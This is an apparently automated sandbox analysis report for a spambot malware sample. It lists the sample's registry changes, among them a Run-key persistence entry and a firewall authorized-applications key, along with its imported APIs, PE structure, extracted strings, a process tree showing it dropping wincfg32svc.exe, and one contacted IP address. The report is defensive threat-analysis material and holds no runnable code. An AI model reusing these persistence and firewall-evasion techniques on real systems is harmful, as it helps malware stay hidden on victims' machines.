HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableFileTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableConsoleTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\ConsoleTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\MaxFileSize
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileDirectory
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableFileTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableConsoleTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\ConsoleTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\MaxFileSize
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe3\xa9\x98\xc8\x8aEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableFileTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableConsoleTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\ConsoleTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\MaxFileSize
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileDirectory
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableFileTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableConsoleTracing
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\ConsoleTracingMask
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\MaxFileSize
\xe3\xa9\x98\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe3\xa9\x98\xc8\x8aEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.Module32FirstW
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll.wcslen
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.fscanf
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll.wcscmp
msvcrt.dll.fclose
msvcrt.dll._snwprintf
msvcrt.dll.atoi
msvcrt.dll.fgets
msvcrt.dll.strchr
msvcrt.dll.strcpy
msvcrt.dll.strcat
msvcrt.dll.strlen
msvcrt.dll.strstr
msvcrt.dll._snprintf
msvcrt.dll.memset
msvcrt.dll.malloc
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll.sprintf
msvcrt.dll._wfopen
msvcrt.dll.feof
msvcrt.dll.fprintf
ws2_32.dll.#115
ws2_32.dll.#19
ws2_32.dll.#3
ws2_32.dll.#52
ws2_32.dll.#9
ws2_32.dll.#23
ws2_32.dll.#4
ws2_32.dll.#11
ws2_32.dll.#16
wininet.dll.InternetOpenUrlA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFileExistsW
dnsapi.dll.DnsQuery_A
dnsapi.dll.DnsFree
kernel32.dll.lstrcpyA
kernel32.dll.Sleep
kernel32.dll.CreateThread
kernel32.dll.CreateProcessW
kernel32.dll.ExitThread
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.FileTimeToSystemTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.GetTickCount
kernel32.dll.DeleteFileW
kernel32.dll.SetFileAttributesW
kernel32.dll.GetLocalTime
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.ReadFile
kernel32.dll.SetFilePointer
kernel32.dll.WriteFile
kernel32.dll.lstrlenA
kernel32.dll.GetFileSize
kernel32.dll.CloseHandle
kernel32.dll.CreateFileW
kernel32.dll.GetSystemTime
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.CopyFileW
kernel32.dll.CreateDirectoryW
kernel32.dll.GetModuleFileNameW
kernel32.dll.ExpandEnvironmentStringsW
user32.dll.CharUpperA
user32.dll.wsprintfA
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
C:\Windows\750547060050\wincfg32svc.exe
5796979494
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x0040612b
Reported Checksum 0x0002a39c
Actual Checksum 0x0002a39c
Minimum OS Version 5.1
Compile Time 2018-06-12 09:38:39
Import Hash d35bcbd35d8412168d5b53bfa8e7da9d
Exported DLL Name \x8e\x01LookupPrivilegeNameA

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00013dae 0x00013e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.56
.rdata 0x00015000 0x0000429e 0x00004400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.26
.data 0x0001a000 0x0000d7c8 0x0000ae00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.31
.rsrc 0x00028000 0x00001ca0 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.02
.reloc 0x0002a000 0x00001cc2 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.69

Imports

Library KERNEL32.dll:
0x415028 TerminateProcess
0x41502c LCMapStringA
0x415030 GetLastError
0x415034 GetProcAddress
0x41503c SetCommMask
0x415044 VirtualProtect
0x41504c DuplicateHandle
0x415050 TerminateThread
0x415058 GetThreadTimes
0x41505c lstrcpyA
0x415064 CreateFileA
0x415068 GetLocaleInfoW
0x41506c LoadLibraryA
0x415070 LoadLibraryW
0x415074 GlobalAlloc
0x415078 EscapeCommFunction
0x41507c GetDriveTypeA
0x415080 GetModuleHandleW
0x415084 GetCommProperties
0x415088 GetCurrentProcess
0x415090 SetComputerNameExA
0x415094 CloseHandle
0x415098 ExitProcess
0x41509c FlushFileBuffers
0x4150a0 WriteConsoleW
0x4150a4 GetConsoleOutputCP
0x4150a8 WriteConsoleA
0x4150b4 Sleep
0x4150c8 HeapFree
0x4150d4 IsDebuggerPresent
0x4150d8 GetCommandLineA
0x4150dc GetStartupInfoA
0x4150e0 RtlUnwind
0x4150e4 RaiseException
0x4150e8 WideCharToMultiByte
0x4150ec MultiByteToWideChar
0x4150f0 LCMapStringW
0x4150f4 GetCPInfo
0x4150f8 HeapAlloc
0x4150fc HeapCreate
0x415100 VirtualFree
0x415104 VirtualAlloc
0x415108 HeapReAlloc
0x41510c TlsGetValue
0x415110 TlsAlloc
0x415114 TlsSetValue
0x415118 TlsFree
0x41511c SetLastError
0x415120 GetCurrentThreadId
0x415124 ReadFile
0x415128 WriteFile
0x41512c GetConsoleCP
0x415130 GetConsoleMode
0x415134 GetStdHandle
0x415138 GetModuleFileNameA
0x41514c SetHandleCount
0x415150 GetFileType
0x415158 GetTickCount
0x41515c GetCurrentProcessId
0x415164 HeapSize
0x415168 GetACP
0x41516c GetOEMCP
0x415170 IsValidCodePage
0x415174 GetUserDefaultLCID
0x415178 GetLocaleInfoA
0x41517c EnumSystemLocalesA
0x415180 IsValidLocale
0x415184 GetStringTypeA
0x415188 GetStringTypeW
0x415190 SetFilePointer
0x415194 SetStdHandle
Library USER32.dll:
0x4151a4 GetScrollRange
0x4151a8 GetPropW
0x4151ac PostMessageW
0x4151b0 GetFocus
0x4151b4 SetScrollRange
Library GDI32.dll:
0x41501c EndPath
0x415020 FillPath
Library ADVAPI32.dll:
0x415004 GetUserNameA
Library MSIMG32.dll:
0x41519c TransparentBlt
Library WINHTTP.dll:
0x4151bc WinHttpOpen
0x4151c0 WinHttpCloseHandle

Exports

Ordinal Address Name
101596 0x6e8500de
101597 0x74a15064
101598 0x44870068
101599 0x2e723349
101600 0xac6c64
101601 0x659302af
101602 0x63a55374
101603 0x74a97275
101604 0x73a54479
101605 0x70a97263
101606 0x43b26f74
101607 0x72b46e6f
101608 0x406c6f
101609 0x6f8c018e
101610 0x70b56b6f
101611 0x76a97250
101612 0x67a56c69
101613 0x6da14e65
101614 0x404165
101615 0x65870141
101616 0x63a55374
101617 0x74a97275
101618 0x73a54479
101619 0x70a97263
101620 0x43b26f74
101621 0x72b46e6f
101622 0x406c6f
101623 0x6587015e
101624 0x65b35574
101625 0x6da14e72
101626 0x404165
101627 0x6e890178
101628 0x61a97469
101629 0x79936574
101630 0x6da57473
101631 0x74b56853
101632 0x6eb76f64
101633 0x1820057
101634 0x53b46547
101635 0x72b56365
101636 0x44b97469
101637 0x72a37365
101638 0x6fb47069
101639 0x63a14472
101640 0x4481006c
101641 0x49904156
101642 0x646e3233
101643 0x406c6c
101644 0x72940003
101645 0x70b36e61
101646 0x6ea57261
101647 0x74ac4274
101648 0x538d0000
101649 0x33874d49
101650 0x6ca42e32
101651 0x48006c
101652 0x48ae6957
101653 0x43b07474
101654 0x65b36f6c
101655 0x64ae6148
101656 0x40656c
101657 0x69970010
101658 0x74b4486e
101659 0x65b04f70
101660 0x4997006e
101661 0x5494484e
101662 0x6ca42e50
101663 0x300006c
101664 0x65b46e49
101665 0x63af6c72
101666 0x49a4656b
101667 0x65b2636e
101668 0x74ae656d
101669 0x2fc0000
101670 0x65b46e49
101671 0x63af6c72
101672 0x44a4656b
101673 0x65b26365
101674 0x74ae656d
101675 0x4610000
101676 0x65a56c53
101677 0x2f40070
101678 0x74a96e49
101679 0x69ac6169
101680 0x7283657a
101681 0x63a97469
101682 0x65936c61
101683 0x6fa97463
101684 0xfe006e
101685 0x65ac6544
101686 0x72836574
101687 0x63a97469
101688 0x65936c61
101689 0x6fa97463
101690 0x119006e
101691 0x65b46e45
101692 0x69b24372
101693 0x61a36974
101694 0x63a5536c
101695 0x6eaf6974
101696 0x32f0000
101697 0x76a1654c
101698 0x69b24365
101699 0x61a36974
101700 0x63a5536c
101701 0x6eaf6974
101702 0x2e10000
101703 0x70a16548
101704 0x65a57246
101705 0x47e0000
101706 0x61a86e55
101707 0x65ac646e
101708 0x63b84564
101709 0x69b47065
101710 0x69866e6f
101711 0x72a5746c
101712 0x4550000
101713 0x55b46553
101714 0x6ea1686e
101715 0x64a56c64
101716 0x65a37845
101717 0x6fa97470
101718 0x6ca9466e
101719 0xb26574
101720 0x738902d1
101721 0x75a26544
101722 0x72a56767
101723 0x73a57250
101724 0xb46e65
101725 0x6587016f
101726 0x6daf4374
101727 0x64ae616d
101728 0x65ae694c
101729 0x2790041
101730 0x53b46547
101731 0x74b26174
101732 0x6e897075
101733 0x816f66
101734 0x74920392
101735 0x77ae556c
101736 0xa46e69
101737 0x6192035a
101738 0x45a57369
101739 0x70a56378
101740 0x6eaf6974
101741 0x4ba0000
101742 0x65a46957
101743 0x72a16843
101744 0x758d6f54
101745 0x42a9746c
101746 0xa57479
101747 0x758d031a
101748 0x42a9746c
101749 0x54a57479
101750 0x64a9576f
101751 0x61a84365
101752 0x3230072
101753 0x618d434c
101754 0x72b45370
101755 0x57a76e69
101756 0x19b0000
101757 0x43b46547
101758 0x66ae4950
101759 0x2dd006f
101760 0x70a16548
101761 0x6fac6c41
101762 0x2df0063
101763 0x70a16548
101764 0x61a57243
101765 0x406574
101766 0x69960457
101767 0x61b57472
101768 0x65b2466c
101769 0x4940065
101770 0x74b26956
101771 0x41ac6175
101772 0x63af6c6c
101773 0x2e40000
101774 0x70a16548
101775 0x6c816552
101776 0xa36f6c
101777 0x6c940434
101778 0x74a54773
101779 0x75ac6156
101780 0x4720065
101781 0x41b36c54
101782 0x63af6c6c
101783 0x4750000
101784 0x53b36c54
101785 0x61967465
101786 0xa5756c
101787 0x6c940433
101788 0x65b24673
101789 0x42c0065
101790 0x4cb46553
101791 0x45b47361
101792 0x72af7272
101793 0x1ed0000
101794 0x43b46547
101795 0x65b27275
101796 0x6894746e
101797 0x64a16572
101798 0x406449
101799 0x65920368
101800 0x69866461
101801 0x40656c
101802 0x7297048d
101803 0x46a57469
101804 0xa56c69
101805 0x65870183
101806 0x6eaf4374
101807 0x65ac6f73
101808 0x405043
101809 0x65870195
101810 0x6eaf4374
101811 0x65ac6f73
101812 0x65a46f4d
101813 0x27b0000
101814 0x53b46547
101815 0x61886474
101816 0x65ac646e
101817 0x2340000
101818 0x4db46547
101819 0x6cb5646f
101820 0x6ca94665
101821 0x6da14e65
101822 0x404165
101823 0x7286014a
101824 0x6e856565
101825 0x6fb26976
101826 0x6ea56d6e
101827 0x72b45374
101828 0x73a76e69
101829 0x1ff0041
101830 0x45b46547
101831 0x72a9766e
101832 0x65ad6e6f
101833 0x7493746e
101834 0x67ae6972
101835 0x18b0073
101836 0x65a57246
101837 0x69b66e45
101838 0x6dae6f72
101839 0x53b46e65
101840 0x6ea97274
101841 0x977367
101842 0x658701c1
101843 0x76ae4574
101844 0x6eaf7269
101845 0x74ae656d
101846 0x69b27453
101847 0x57b3676e
101848 0x4280000
101849 0x48b46553
101850 0x6ca46e61
101851 0x75af4365
101852 0x40746e
101853 0x658701d7
101854 0x6ca94674
101855 0x70b95465
101856 0x3940065
101857 0x72a57551
101858 0x72a55079
101859 0x6db26f66
101860 0x65a36e61
101861 0x6eb56f43
101862 0xb26574
101863 0x65870266
101864 0x63a95474
101865 0x75af436b
101866 0x40746e
101867 0x658701aa
101868 0x72b54374
101869 0x74ae6572
101870 0x63af7250
101871 0x49b37365
101872 0x28f0064
101873 0x53b46547
101874 0x65b47379
101875 0x6da9546d
101876 0x46b34165
101877 0x54a56c69
101878 0xa56d69
101879 0x658802a6
101880 0x69937061
101881 0x40657a
101882 0x65870152
101883 0x50834174
101884 0x2530000
101885 0x4fb46547
101886 0x50834d45
101887 0x31b0000
101888 0x61967349
101889 0x43a4696c
101890 0x50a5646f
101891 0xa56761
101892 0x6587026d
101893 0x65b35574
101894 0x66a54472
101895 0x74ac7561
101896 0x4489434c
101897 0x2280000
101898 0x4cb46547
101899 0x6ca1636f
101900 0x66ae4965
101901 0x40416f
101902 0x6e8500f8
101903 0x79936d75
101904 0x6da57473
101905 0x61a36f4c
101906 0x41b3656c
101907 0x31d0000
101908 0x61967349
101909 0x4ca4696c
101910 0x6ca1636f
101911 0x27d0065
101912 0x53b46547
101913 0x6ea97274
101914 0x70b95467
101915 0x404165
101916 0x65870240
101917 0x72b45374
101918 0x54a76e69
101919 0x57a57079
101920 0x2f50000
101921 0x74a96e49
101922 0x69ac6169
101923 0x7283657a
101924 0x63a97469
101925 0x65936c61
101926 0x6fa97463
101927 0x64ae416e
101928 0x6ea97053
101929 0x6eb56f43
101930 0x41f0074
101931 0x46b46553
101932 0x50a56c69
101933 0x74ae696f
101934 0x407265
101935 0x659303fc
101936 0x64b45374
101937 0x64ae6148
101938 0x40656c
101939 0x72970482
101940 0x43a57469
101941 0x6fb36e6f
101942 0x81656c
101943 0x65870199
101944 0x6eaf4374
101945 0x65ac6f73
101946 0x70b4754f
101947 0x50837475
101948 0x4cc0000
101949 0x74a97257
101950 0x6eaf4365
101951 0x65ac6f73
101952 0x1810057
101953 0x73b56c46
101954 0x6ca94668
101955 0x66b54265
101956 0x73b26566
101957 0x3310000
101958 0x64a16f4c
101959 0x72a2694c
101960 0x41b97261
101961 0x22a0000
101962 0x4cb46547
101963 0x6ca1636f
101964 0x66ae4965
101965 0x40576f
101966 0x72830078
101967 0x65b46165
101968 0x65ac6946
101969 0x400041
.text
`.rdata
@.data
.rsrc
@.reloc
Rh|uA
YQPVh
uQhTRA
QW@Ph
t hpcA
uL9=4UB
t$h0\A
;5dVB
9=dVB
9=4UB
SVWUj
PhPVB
bad allocation
string too long
invalid string position
Unknown exception
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
(null)
`h````
CorExitProcess
runtime error
Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
bad exception
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
bad allocation
VirtualAlloc
Module32FirstW
zebazobupuyobumetelawefibudiwu
kernel
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
vector<T> too long
bad cast
ExitProcess
SetComputerNameExA
SetConsoleTextAttribute
GetCurrentProcess
GetCommProperties
GetModuleHandleW
EscapeCommFunction
GetDriveTypeA
GlobalAlloc
LoadLibraryW
TerminateThread
TerminateProcess
LCMapStringA
GetLastError
GetProcAddress
SetProcessWorkingSetSize
SetCommMask
GetProcessAffinityMask
VirtualProtect
CreateToolhelp32Snapshot
DuplicateHandle
CloseHandle
GetFileInformationByHandle
GetThreadTimes
lstrcpyA
LocalFileTimeToFileTime
KERNEL32.dll
GetPropW
GetScrollRange
SetScrollRange
GetFocus
PostMessageW
USER32.dll
FillPath
EndPath
GDI32.dll
SetSecurityDescriptorControl
LookupPrivilegeNameA
GetSecurityDescriptorControl
GetUserNameA
InitiateSystemShutdownW
GetSecurityDescriptorDacl
ADVAPI32.dll
TransparentBlt
MSIMG32.dll
WinHttpCloseHandle
WinHttpOpen
WINHTTP.dll
InterlockedIncrement
InterlockedDecrement
Sleep
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
HeapFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCommandLineA
GetStartupInfoA
RtlUnwind
RaiseException
WideCharToMultiByte
MultiByteToWideChar
LCMapStringW
GetCPInfo
HeapAlloc
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
ReadFile
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
GetACP
GetOEMCP
IsValidCodePage
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
GetStringTypeA
GetStringTypeW
InitializeCriticalSectionAndSpinCount
SetFilePointer
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
FlushFileBuffers
LoadLibraryA
GetLocaleInfoW
CreateFileA
.?AV_Locimp@locale@std@@
.?AVout_of_range@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$_Iosb@H@std@@
.?AVios_base@std@@
lagobaji
kaledeticegodacegudohakomojewe hogidipo
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVfailure@ios_base@std@@
&)'/<
#+410'$"-
;:6?32
<<$6$<
#:39)
78")#
(.?>=1
&90:+
;%2>=!
7,3/&5?2
<-#&)
!,.?6
.2(33
9"4/9"
<:+"<>=
246&4
*160>.+?
&4)(,;
.?AVlength_error@std@@
.?AVbad_cast@std@@
.?AVbad_alloc@std@@
>J?l?
>)?I?W?\?
283@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3(<,<
=,=L=
:0:L:
KERNEL32.DLL
(null)
mscoree.dll
kernel32.dll
rasularulegafefoji xejalugivocifawi zaletexirubodoxuyebu damozigohaxafazenevidizaho
VS_VERSION_INFO
StringFileInfo
457aa56b
InternalName
howora.exe
ProductVersion
1.0.1.98
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


2019-01-08-spambot-malware.exe, PID: 2924, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
Command Line: "C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe"
wincfg32svc.exe, PID: 2688, Parent PID: 2924
Full Path: C:\Windows\750547060050\wincfg32svc.exe
Command Line: C:\Windows\750547060050\wincfg32svc.exe

Hosts

Direct IP Country Name
N 98.136.101.117 [VT] United States
